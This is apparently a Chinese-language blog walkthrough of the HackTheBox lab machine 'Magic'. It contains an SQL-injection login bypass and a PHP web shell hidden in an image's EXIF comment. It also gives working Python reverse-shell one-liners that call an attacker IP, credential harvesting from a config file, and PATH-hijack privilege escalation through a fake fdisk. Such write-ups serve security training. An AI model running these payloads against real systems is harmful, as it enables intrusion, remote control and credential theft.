文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-04-28   2.8k

HTB::Magic Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • exiftool
  • LinEnum.sh
  • SQL Injection
  • mysqldump
  • sysinfo
  • PATH variable

0x03 Pentesting

Initial Enueration

端口扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ nmap -A -Pn -T4 -p- 10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-23 10:22 EDT
Stats: 0:10:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 22.07% done; ETC: 11:10 (0:36:54 remaining)
Warning: 10.10.10.185 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.185
Host is up (0.34s latency).
Not shown: 65455 closed ports, 78 filtered ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6500.05 seconds

常规80端口,进入站点发现有一个Login界面,随便试一下,又是常规的SQL Injection,Burp修改数据,payload万能密码admin' or 1=1--+即可。

登录成功后,有一个上传图片的功能,经过尝试之后发现只能上传固定的图片格式的文件,但是好像没有对图片内容进行检查。随便找一个正常文件,用exiftool工具写入payload:

1
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' normal.jpg

更改后缀名:

1
mv normal.jpg normal.php.jpg

上传文件后,在主页查看页面源代码,发现上传图片的相对路径是images/uploads/normal.php.jpg,访问该路径发现可以正常回显。

再在url上添加下面内容作为cmd参数,用来执行reverse shell,在本机监听相应的端口:

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

注意:这个靶机只有python3的环境

成功拿到www-data权限:

1
2
3
4
5
6
7
8
9
$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.185] 58816
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/www/Magic/images/uploads$

Getting User Access

查找敏感文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
[email protected]:/var/www/Magic/images/uploads$ cd ../../
cd ../../
[email protected]:/var/www/Magic$ ls
ls
assets db.php5 images index.php login.php logout.php [email protected]:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

private static $cont = null;

public function __construct() {
die('Init function is not allowed');
}

public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}

public static function disconnect()
{
self::$cont = null;
}
}

有一个配置文件,用户名是theseus,密码是iamkingtheseus,尝试用这个密码切换用户:

1
2
3
4
5
[email protected]:/var/www/Magic$ su theseus
su theseus
Password: iamkingtheseus

su: Authentication failure

密码错误,这个应该是MySQL数据库的登录密码。当我准备用mysql命令时,提示我apt-get install,但是靶机上明明就运行着MySQL服务,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
[email protected]:/var/www/Magic$ ls -la /usr/bin/ | grep mysql
ls -la /usr/bin/ | grep mysql
-rwxr-xr-x 1 root root 3627200 Jan 21 06:10 mysql_config_editor
-rwxr-xr-x 1 root root 22558552 Jan 21 06:10 mysql_embedded
-rwxr-xr-x 1 root root 5179616 Jan 21 06:10 mysql_install_db
-rwxr-xr-x 1 root root 3616952 Jan 21 06:10 mysql_plugin
-rwxr-xr-x 1 root root 3784424 Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x 1 root root 3653288 Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x 1 root root 3569976 Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x 1 root root 4442320 Jan 21 06:10 mysql_upgrade
-rwxr-xr-x 1 root root 3799752 Jan 21 06:10 mysqladmin
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x 1 root root 4068280 Jan 21 06:10 mysqlbinlog
-rwxr-xr-x 1 root root 3825320 Jan 21 06:10 mysqlcheck
-rwxr-xr-x 1 root root 26952 Jan 21 06:10 mysqld_multi
-rwxr-xr-x 1 root root 28448 Jan 21 06:10 mysqld_safe
-rwxr-xr-x 1 root root 3875176 Jan 21 06:10 mysqldump
-rwxr-xr-x 1 root root 7865 Jan 21 06:10 mysqldumpslow
-rwxr-xr-x 1 root root 3791912 Jan 21 06:10 mysqlimport
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x 1 root root 4286120 Jan 21 06:10 mysqlpump
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x 1 root root 39016 Jan 12 2018 mysqlreport
-rwxr-xr-x 1 root root 3790504 Jan 21 06:10 mysqlshow
-rwxr-xr-x 1 root root 3809512 Jan 21 06:10 mysqlslap

找到了 dump MySQL database

1
mysqldump --databases Magic -utheseus -piamkingtheseus

得到用户名和密码admin:Th3s3usW4sK1ng

再把本机的SSH public key加入到靶机的/home/thesues/.ssh/authenticated_keys,SSH直接登录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ ssh [email protected]
The authenticity of host '10.10.10.185 (10.10.10.185)' can't be established.
ECDSA key fingerprint is SHA256:yx0Y6af8RGpG0bHr1AQtS+06uDomn1MMZVzpNaHEv0A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.185' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Apr 25 22:27:50 2020 from 10.10.14.44
[email protected]:~$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

Getting Root Access

查找SUID文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[email protected]:~/.ssh$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
...
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

可以发现一个不太寻常SUID:sysinfo

1
2
3
[email protected]:~$ file /bin/sysinfo
file /bin/sysinfo
/bin/sysinfo: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=9e9d26d004da0634c0747d16d377cd2a934e565a, not stripped

运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
[email protected]:~$ sysinfo
sysinfo
====================Hardware Info====================
H/W path Device Class Description
=====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7401P 24-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/100/17.5 bridge PCI Express Root Port
/0/100/17.6 bridge PCI Express Root Port
/0/100/17.7 bridge PCI Express Root Port
/0/100/18 bridge PCI Express Root Port
/0/100/18.1 bridge PCI Express Root Port
/0/100/18.2 bridge PCI Express Root Port
/0/100/18.3 bridge PCI Express Root Port
/0/100/18.4 bridge PCI Express Root Port
/0/100/18.5 bridge PCI Express Root Port
/0/100/18.6 bridge PCI Express Root Port
/0/100/18.7 bridge PCI Express Root Port
/0/46 scsi0 storage
/0/46/0.0.0 /dev/cdrom disk VMware IDE CDR00
/1 system

====================Disk Info====================
Disk /dev/loop0: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop1: 54.5 MiB, 57151488 bytes, 111624 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop11: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor : 0
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips : 4000.00
TLB size : 2560 4K pages
clflush size : 64
cache_alignment : 64
address sizes : 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
total used free shared buff/cache available
Mem: 3.8G 566M 2.4G 4.0M 929M 3.1G
Swap: 947M 0B 947M

sysinfo显示出来的内容主要分为四个部分

  • Hardware Info
  • Disk Info
  • CPU Info
  • Mem Usage

查阅了Forum上前辈们给的提示,发现sysinfo是四个Linux命令的组合调用:

  • Hardware Info = lshw -short
  • Disk Info = fdisk -l
  • CPU Info = cat /proc/cpuinfo
  • Mem Usage = free -h

既然sysinfo调用的是原生的Linux命令,那么我们就可以通过改变PATH变量,创建一个内容由自己决定,文件名为上面四种任意一个的“二进制文件”,具体而言:

/tmp/magic目录下创建一个fdisk文件,然后向其中写入reverse shell:

1
2
3
4
[email protected]:/tmp/magic$ touch fdisk
touch fdisk
[email protected]:/tmp/magic$ echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > fdisk
<(),2);p=subprocess.call(["/bin/sh","-i"]);' > fdisk

更改权限755

1
[email protected]:/tmp/magic$ chmod fdisk 755

然后将/tmp/magic目录写到PATH环境变量中:

1
2
[email protected]:/tmp/magic$ export PATH=/tmp/magic:$PATH
export PATH=/tmp/magic:$PATH

更详细的解释可以看这篇文章:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

这样就达到了目的,即sysinfo会去执行/tmp/magic目录下的fdisk

本机监听1234端口,靶机运行sysinfo命令:

1
2
3
4
5
Ncat: Connection from 10.10.10.185:45410.
python3 -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/tmp# whoami
whoami
root

0x04 Summary

  • 利用SQL Injection登录上传图片页面
  • 使用exiftool工具向正常图片添加web shell
  • 上传图片获得www-data的reverse shell
  • db.php5获得MySQL数据库的登录名和密码
  • 使用mysqldump备份数据库,得到网站的admin密码,即用户theseus的su密码
  • 分析sysinfo的输出信息
  • 使用PATH变量提权
Copyright © ca01h 2019-2020 | 本站总访问量